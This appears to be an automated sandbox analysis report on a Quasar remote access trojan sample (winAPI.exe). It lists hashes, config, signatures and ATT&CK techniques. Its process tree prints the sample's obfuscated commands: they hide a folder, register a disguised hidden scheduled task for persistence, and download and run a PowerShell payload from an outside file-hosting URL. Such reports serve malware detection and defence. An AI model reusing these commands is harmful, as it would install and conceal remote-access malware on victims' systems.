quasar | bfa990bda3eebc658bcd0014dbfc9d57277e585548031f7ce4ecfcc8223f7b6b

Analysis

max time kernel
100s
max time network
149s
platform
windows11-21h2_x64
resource
win11-20250411-en
resource tags

arch:x64arch:x86image:win11-20250411-enlocale:en-usos:windows11-21h2-x64system
submitted
19/04/2025, 15:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

winAPI.exe
Size

36.0MB
MD5

fb466528aac78a063f4c60882a33ddc9
SHA1

2af35fa26c27e402e66b7c46d136a4a578f975af
SHA256

6f157135b2b74872f88863cc5bd1edbe8fbe3532dfb9e1b961afca9bb5c77fd3
SHA512

0539f5681271f70262288fcc0b7bd89d63c6c8b8f32f96bd43878df531f9997cde314357f541ca49f58363c484cca80a107b450fd37e3e35e75fd90edac71e77
SSDEEP

393216:f1Du8BtuBw2FEL3Z3aLUoQvo6LP/SgbSpYvKEh1EdKwlGQKPJuGsiTfREsrgCYf8:fMguj8Q4VfvwqFTrYCl

Score

10^/10

quasar execution spyware trojan

Malware Config

Extracted

Family

quasar

��:a>՘�后��s��6�F�l濺�,@ 3&�

Attributes

encryption_key
0A2600918F5E13281DD3F3E3CF35CA2FEACB6884
reconnect_delay
3000
startup_key
�� D��s�+��\� r8t$�

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral18/memory/4532-56-0x0000023298630000-0x00000232987BE000-memory.dmp	family_quasar

Blocklisted process makes network request 5 IoCs

flow	pid	Process
2	5692	powershell.exe
3	4532	powershell.exe
4	4532	powershell.exe
5	4532	powershell.exe
7	4532	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
444	powershell.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4532	powershell.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
444	powershell.exe
444	powershell.exe
5692	powershell.exe
5692	powershell.exe
4532	powershell.exe
4532	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	444	powershell.exe
Token: SeIncreaseQuotaPrivilege	444	powershell.exe
Token: SeSecurityPrivilege	444	powershell.exe
Token: SeTakeOwnershipPrivilege	444	powershell.exe
Token: SeLoadDriverPrivilege	444	powershell.exe
Token: SeSystemProfilePrivilege	444	powershell.exe
Token: SeSystemtimePrivilege	444	powershell.exe
Token: SeProfSingleProcessPrivilege	444	powershell.exe
Token: SeIncBasePriorityPrivilege	444	powershell.exe
Token: SeCreatePagefilePrivilege	444	powershell.exe
Token: SeBackupPrivilege	444	powershell.exe
Token: SeRestorePrivilege	444	powershell.exe
Token: SeShutdownPrivilege	444	powershell.exe
Token: SeDebugPrivilege	444	powershell.exe
Token: SeSystemEnvironmentPrivilege	444	powershell.exe
Token: SeRemoteShutdownPrivilege	444	powershell.exe
Token: SeUndockPrivilege	444	powershell.exe
Token: SeManageVolumePrivilege	444	powershell.exe
Token: 33	444	powershell.exe
Token: 34	444	powershell.exe
Token: 35	444	powershell.exe
Token: 36	444	powershell.exe
Token: SeIncreaseQuotaPrivilege	444	powershell.exe
Token: SeSecurityPrivilege	444	powershell.exe
Token: SeTakeOwnershipPrivilege	444	powershell.exe
Token: SeLoadDriverPrivilege	444	powershell.exe
Token: SeSystemProfilePrivilege	444	powershell.exe
Token: SeSystemtimePrivilege	444	powershell.exe
Token: SeProfSingleProcessPrivilege	444	powershell.exe
Token: SeIncBasePriorityPrivilege	444	powershell.exe
Token: SeCreatePagefilePrivilege	444	powershell.exe
Token: SeBackupPrivilege	444	powershell.exe
Token: SeRestorePrivilege	444	powershell.exe
Token: SeShutdownPrivilege	444	powershell.exe
Token: SeDebugPrivilege	444	powershell.exe
Token: SeSystemEnvironmentPrivilege	444	powershell.exe
Token: SeRemoteShutdownPrivilege	444	powershell.exe
Token: SeUndockPrivilege	444	powershell.exe
Token: SeManageVolumePrivilege	444	powershell.exe
Token: 33	444	powershell.exe
Token: 34	444	powershell.exe
Token: 35	444	powershell.exe
Token: 36	444	powershell.exe
Token: SeIncreaseQuotaPrivilege	444	powershell.exe
Token: SeSecurityPrivilege	444	powershell.exe
Token: SeTakeOwnershipPrivilege	444	powershell.exe
Token: SeLoadDriverPrivilege	444	powershell.exe
Token: SeSystemProfilePrivilege	444	powershell.exe
Token: SeSystemtimePrivilege	444	powershell.exe
Token: SeProfSingleProcessPrivilege	444	powershell.exe
Token: SeIncBasePriorityPrivilege	444	powershell.exe
Token: SeCreatePagefilePrivilege	444	powershell.exe
Token: SeBackupPrivilege	444	powershell.exe
Token: SeRestorePrivilege	444	powershell.exe
Token: SeShutdownPrivilege	444	powershell.exe
Token: SeDebugPrivilege	444	powershell.exe
Token: SeSystemEnvironmentPrivilege	444	powershell.exe
Token: SeRemoteShutdownPrivilege	444	powershell.exe
Token: SeUndockPrivilege	444	powershell.exe
Token: SeManageVolumePrivilege	444	powershell.exe
Token: 33	444	powershell.exe
Token: 34	444	powershell.exe
Token: 35	444	powershell.exe
Token: 36	444	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4532	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 1616 wrote to memory of 4028	1616	winAPI.exe	79
PID 1616 wrote to memory of 4028	1616	winAPI.exe	79
PID 4028 wrote to memory of 1980	4028	cmd.exe	80
PID 4028 wrote to memory of 1980	4028	cmd.exe	80
PID 1980 wrote to memory of 3992	1980	cmd.exe	81
PID 1980 wrote to memory of 3992	1980	cmd.exe	81
PID 1980 wrote to memory of 444	1980	cmd.exe	82
PID 1980 wrote to memory of 444	1980	cmd.exe	82
PID 1980 wrote to memory of 5692	1980	cmd.exe	84
PID 1980 wrote to memory of 5692	1980	cmd.exe	84
PID 1980 wrote to memory of 4532	1980	cmd.exe	85
PID 1980 wrote to memory of 4532	1980	cmd.exe	85
PID 4532 wrote to memory of 2040	4532	powershell.exe	86
PID 4532 wrote to memory of 2040	4532	powershell.exe	86
PID 2040 wrote to memory of 1052	2040	csc.exe	87
PID 2040 wrote to memory of 1052	2040	csc.exe	87

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3992	attrib.exe

C:\Users\Admin\AppData\Local\Temp\winAPI.exe
"C:\Users\Admin\AppData\Local\Temp\winAPI.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1.bat""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4028
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1980
  - - C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache"
      4⤵
      Views/modifies file attributes
      PID:3992
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -NoPr"o"file -Execu"t"ionPolic"y" Byp"a"ss -Windo"w"Style Hid"d"en -Com"m"and "$action = New-ScheduledT"a"skAction -Execute 'powershell.exe' -Argument '-NoProfile -Exe"c"utionPo"l"icy B"y"pass -Wind"o"wStyle Hidden -File \"C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1\"'; $trigger = New-ScheduledTaskTrigger -AtLogOn -User $env:USERNAME; $settings = New-ScheduledTaskSettingsSet -Hidden -DontStopIfGoingOnBatteries; $principal = New-ScheduledTaskPrincipal -UserId $env:USERNAME -LogonType Interactive; Register-ScheduledTask -TaskName 'Micro"s"oftEdge"U"pdat"e"Task' -Action $action -Trigger $trigger -Settings $settings -Principal $principal -Force | Out-Null"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:444
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -NoPr"o"file -Exe"c"utionPol"i"cy By"p"ass -Win"d"owStyle H"i"dd"e"n -Co"m"mand "Invo"k"e-W"e"bRequ"e"st 'ht"t"ps://"f"iles."c"atbo"x".moe/92nbzf.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1' -Use"B"asicParsing"
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      PID:5692
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -N"o"Profi"l"e -Execu"t"ionPol"i"cy Bypa"s"s -WindowSt"y"le Hi"d"den -Fi"l"e "C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1"
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: AddClipboardFormatListener
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:4532
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hfb3ttih\hfb3ttih.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2040
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES530D.tmp" "c:\Users\Admin\AppData\Local\Temp\hfb3ttih\CSC538DA8D1FC24BFA912EECBC8B1DF97C.TMP"
        6⤵
        
        PID:1052

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
df472dcddb36aa24247f8c8d8a517bd7

SHA1
6f54967355e507294cbc86662a6fbeedac9d7030

SHA256
e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

SHA512
06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
adecdcb123e974a5590782e6c8961995

SHA1
61e048609ede0601ca11892ad4d7a6f24194e132

SHA256
a3a36352abe201f01069f6266146c9c36153951ded82384ba829b33e08108183

SHA512
81bf8263c460de1b0fc15591bf9b54ae9e4c71af8d6a96056b6ef5877211cad6e4de60698300b89497859215b1cf1ece53681827874eaa48c8e20a738fa2ddfb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5249addb1bedd324d572f6c87b64fe8c

SHA1
e06eda058a68b27168a3135f573c20005ab6b0dc

SHA256
cea8f09841769da24bd25ab50e143ce430e1e72a2bba4abd413c0a60228f523f

SHA512
e31c4164357a63e82e1612a9568e4c3b7d91c346b7bbba272edb7c3e55ae6027b953a09bc3c4fc97d6da540074e300f6ac521846deb8f5fd0b26938028dd3741

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.bat

Filesize
1KB

MD5
56ed4e1fbde1df51fb37b6677265ec3d

SHA1
6dc4cf3ebe6c0043c6fca9b5c9c46a3f5a492d17

SHA256
d65e44cd5593e4f8d380c23516e94db3b18e9a5c42ef40697beb2a611aaa9204

SHA512
c9c037b3713d2774301a4d68beee7c528fd2ade5aac95f06c82b1ef9f23ba47ec316cfc0d711fd773c8c81fd33366537395daee361325c5465cf02eb6dae41c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES530D.tmp

Filesize
1KB

MD5
75694e4d04f894ea55fd3c1abaecdd98

SHA1
14005a92a2b0dae53d450dc3d225f15e31b6034b

SHA256
00c5b472413c5d5634bb462aa5945cf986b4aefc399c6f799268fd55cf287b6a

SHA512
f6c8f22d73f1c5702fc6b6258d10aa3901336516a3c8aa45e666a833a8547df7429a9224cedcb5a367ed22be13ce4ea31f908c912d53a76cdd4c2514ba84a0c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jhhwk2wv.d0d.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\hfb3ttih\hfb3ttih.dll

Filesize
3KB

MD5
d1aa3c4408344d4d860b7fd45e275a11

SHA1
dbd7e5b6beff0ec4032362be4144a13856a95821

SHA256
2e03e7de9020d44a8d02da7436c78819d02fd9b4b567a8b364b5cc84a93bd33e

SHA512
3ae9a43f999a79de85b0f7ebd33ce8d6332f65830e24549154525c9cc1459edef3f132c787041bde448635cfde63471ef8a55feda27b15dc4a1ff07910be7bf7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\UDCache\task.ps1

Filesize
7.0MB

MD5
f46cd513598c2b1ffb63fe501301dd64

SHA1
d1d71cfdc9ea551470478b2452d0e451b8d055e8

SHA256
e8d38cba909fb2374dc0a406fcc0c4360ffb12ba5d588856690e7e06657e6df5

SHA512
bbd43f0f9b7eddc0857ac14339859e0e6b756de8749e54795d86bcdb580d6bf369a5a4050231bf1bdb361ff817907175180f04f352df2e35fce63fbeb4f91974

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hfb3ttih\CSC538DA8D1FC24BFA912EECBC8B1DF97C.TMP

Filesize
652B

MD5
2afa104a09eaeb18086a6abebdfe9bcc

SHA1
2ee9e14094025c79e81a78abcf265b03798e6ecc

SHA256
ba648be4479ec5032a89644428fd3fe07819555ee4fc5d2eca860904152072b2

SHA512
96b84ec6aa32953e8cbf05943fc70e483a111dc14ebac00b5540fb4e05f0c7e2d586278e181ce83cc311ed2ac7c6ae2f9d25f489b32f4b723195e1a8526f197f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hfb3ttih\hfb3ttih.0.cs

Filesize
938B

MD5
5b328f64341f326554c2d3c08ace5f93

SHA1
25a9aad6022782e5200d410aa9ff8e707ee2eb1a

SHA256
6e7a0c2174ae7882e6bd3f4afdf0438b982649021048df980b08c5ac948a01b9

SHA512
d4116697a54bc21a8d77aaa8eeafa95d60b6873073f2294d027829a83dc82bf39d63f08464b7622dcfd4ec3a1991b6225f72399321a5f93582d84387088badd0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hfb3ttih\hfb3ttih.cmdline

Filesize
369B

MD5
53f19926b0687f282cb49803068fe527

SHA1
f3f71af1048c951f32ce4eaefd3b582f9a357388

SHA256
b1728ba82eafe4b130e8342c0f176a8a94b1904cf4740c6316614045f7a6c752

SHA512
524a143bbb4077ad0747d3798104df55dcbf2ee9654ce9592d83073286ff70be0a62f50a6ee8e8a33ac5fa7f1b7774a6a0599e2c07c8bb02d8e3b34a12d75da2

Download Submit
memory/444-17-0x00007FFBA63D0000-0x00007FFBA6E92000-memory.dmp

Filesize
10.8MB

Download
memory/444-14-0x00007FFBA63D0000-0x00007FFBA6E92000-memory.dmp

Filesize
10.8MB

Download
memory/444-13-0x00007FFBA63D0000-0x00007FFBA6E92000-memory.dmp

Filesize
10.8MB

Download
memory/444-12-0x000001CB39EB0000-0x000001CB39ED2000-memory.dmp

Filesize
136KB

Download
memory/444-3-0x00007FFBA63D3000-0x00007FFBA63D5000-memory.dmp

Filesize
8KB

Download
memory/4532-52-0x0000023298000000-0x0000023298008000-memory.dmp

Filesize
32KB

Download
memory/4532-54-0x0000023298020000-0x000002329818A000-memory.dmp

Filesize
1.4MB

Download
memory/4532-56-0x0000023298630000-0x00000232987BE000-memory.dmp

Filesize
1.6MB

Download
memory/4532-57-0x00000232984B0000-0x00000232984CA000-memory.dmp

Filesize
104KB

Download
memory/4532-60-0x00000232FCFE0000-0x00000232FD030000-memory.dmp

Filesize
320KB

Download
memory/4532-61-0x00000232FD400000-0x00000232FD4B2000-memory.dmp

Filesize
712KB

Download
memory/4532-62-0x0000023298C90000-0x0000023298CDE000-memory.dmp

Filesize
312KB

Download
memory/4532-59-0x0000023298C50000-0x0000023298C8A000-memory.dmp

Filesize
232KB

Download
memory/4532-58-0x0000023298C40000-0x0000023298C52000-memory.dmp

Filesize
72KB

Download
memory/4532-65-0x0000023298F10000-0x0000023298F3A000-memory.dmp

Filesize
168KB

Download
memory/4532-64-0x0000023298EC0000-0x0000023298F0A000-memory.dmp

Filesize
296KB

Download
memory/4532-63-0x0000023298CE0000-0x0000023298D2C000-memory.dmp

Filesize
304KB

Download
memory/4532-69-0x00000232FD070000-0x00000232FD0AC000-memory.dmp

Filesize
240KB

Download
memory/4532-68-0x00000232D4620000-0x00000232D4632000-memory.dmp

Filesize
72KB

Download